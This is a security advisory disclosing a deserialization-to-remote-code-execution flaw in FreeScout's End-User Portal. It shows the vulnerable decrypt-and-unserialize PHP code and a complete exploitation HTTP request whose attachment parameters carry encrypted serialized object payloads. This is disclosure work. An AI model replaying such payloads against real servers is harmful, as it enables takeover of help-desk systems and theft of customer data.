public function decodeAttachmentsIds($attachments_list)
{
foreach ($attachments_list as $i => $attachment_id) {
$attachment_id_decrypted = \Helper::decrypt($attachment_id);
if ($attachment_id_decrypted == $attachment_id) {
unset($attachments_list[$i]);
} else {
$attachments_list[$i] = $attachment_id_decrypted; #PT!
}
}
return $attachments_list;
}
POST /help/1132419419 HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: laravel_session=eyJpdiI6InZ0cXdDUGs1SkZTOTlMQWIyWDB4U0E9PSIsInZhbHVlIjoidEQwRlJrNDRLbXREcEo3OXduU1dnQXNrUExYZjVkUnNYZXBLVHQ4MzQ5a1lXOU9OXC91eTRTVE9ndDJkdklFbFJiVEx3MnozalAzSnVmSDIwR1FEZ1BtSmhwZlg5VW1IQmRWcGdRRlNRVjhHZ2lhbnhZbUxENHhcL0xadkZ3aHNuWiIsIm1hYyI6IjBiM2IyMTEwYjQ0YjRmMzc3ZDM4Y2EzY2U2YTgwY2NiY2RhMzVmN2EyY2YzZWY4MjY0NzI0OTExNjg4ZmY0MWQifQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1611
Origin: https://freescout.web-hacks.ru
Referer: https://freescout.web-hacks.ru/help/1132419419
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
_token=akxPyOIBVUDzO3hlOFnS2nzDsdjMocC96gm7sFkZ&conversation_id=&age=&name=zxc&email=zxc%40zxc.zxc&cf%5B1%5D=&message=zxc&attachments_all%5B%5D=eyJpdiI6ICJxMW5xQVFtcE5SNmh6L2F1SHZwcFNRPT0iLCAidmFsdWUiOiAiSDBwT25kZ25jaEc3Q29rM3V2bWhoYnozR2x0RE5naDlrNExEM0w0SDhteFk4MnhFUE53Q3hraTBsOHltYytscXdUSHFaYldMbHFQbTZLaTgzb0dDYXFHQ0QvTm1hb05tcmI1ZzlGU3RicllxSE9nU0Q0dTZwUXR2OUJWNjhvMm8vdDE4Y1F2QmV1SGxVNlFNd1VWTnF5ZzFOTjVqL2ZnZmJubXBGWlBieXh6VDd1MHF1aVhpOHF6TjF6TzhzaTFpNm5xckgrZmMrS1hJeUZCcWs1VE1WVisvSm1RVjJiR0gzZ1JlTHMrT3hleFcxVTcyZXhaT2FnVDFaSnZ3QXgwbWcwZnZ6LzR2OFVNVDhEL0ZDNmMzSzNWZDE0L3MzSW50NTlnZlQ1b0dDOHJybjQrTlppOVc2enNOMVZzRFNwOWxoTFZLak1aSFhWbUpvL3paMVZ6akxTWW40aytWbEpHeUNiZXlUZWpPdDFaT2lOVHluQTd4OTJpdXB2Sk9YSlFDdXhTTGx4cVk5ckhKajBXOGh4ME1CQT09IiwgIm1hYyI6ICJiNGRhMDY1YjBmNDdhMDk4OTYzMDRjYWY0OWYwYTMxYjA5YWMzMzQzODc2ODg4MDA5MWMwYjM5ZjBkNDhmY2I0IiwgInRhZyI6ICIifQ==&attachments%5B%5D=eyJpdiI6ICJxMW5xQVFtcE5SNmh6L2F1SHZwcFNRPT0iLCAidmFsdWUiOiAiSDBwT25kZ25jaEc3Q29rM3V2bWhoYnozR2x0RE5naDlrNExEM0w0SDhteFk4MnhFUE53Q3hraTBsOHltYytscXdUSHFaYldMbHFQbTZLaTgzb0dDYXFHQ0QvTm1hb05tcmI1ZzlGU3RicllxSE9nU0Q0dTZwUXR2OUJWNjhvMm8vdDE4Y1F2QmV1SGxVNlFNd1VWTnF5ZzFOTjVqL2ZnZmJubXBGWlBieXh6VDd1MHF1aVhpOHF6TjF6TzhzaTFpNm5xckgrZmMrS1hJeUZCcWs1VE1WVisvSm1RVjJiR0gzZ1JlTHMrT3hleFcxVTcyZXhaT2FnVDFaSnZ3QXgwbWcwZnZ6LzR2OFVNVDhEL0ZDNmMzSzNWZDE0L3MzSW50NTlnZlQ1b0dDOHJybjQrTlppOVc2enNOMVZzRFNwOWxoTFZLak1aSFhWbUpvL3paMVZ6akxTWW40aytWbEpHeUNiZXlUZWpPdDFaT2lOVHluQTd4OTJpdXB2Sk9YSlFDdXhTTGx4cVk5ckhKajBXOGh4ME1CQT09IiwgIm1hYyI6ICJiNGRhMDY1YjBmNDdhMDk4OTYzMDRjYWY0OWYwYTMxYjA5YWMzMzQzODc2ODg4MDA5MWMwYjM5ZjBkNDhmY2I0IiwgInRhZyI6ICIifQ==
Deserialization of untrusted data leads to Remote code execution [2]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 7.2 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios: /help/{mailbox_id}
Vulnerable parameters:
• POST attachments_all[]
• POST attachments[]
Exploitation conditions: APP_KEY knowledge, End-User Portal module installed
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing Code snippet exploiting the vulnerable function Helper::decrypt (EndUserPortal/Http/Controllers/EndUSerController.php 712-724)
Exploitation scenario:
Listing HTTP-request to exploit «Deserialization of untrusted data»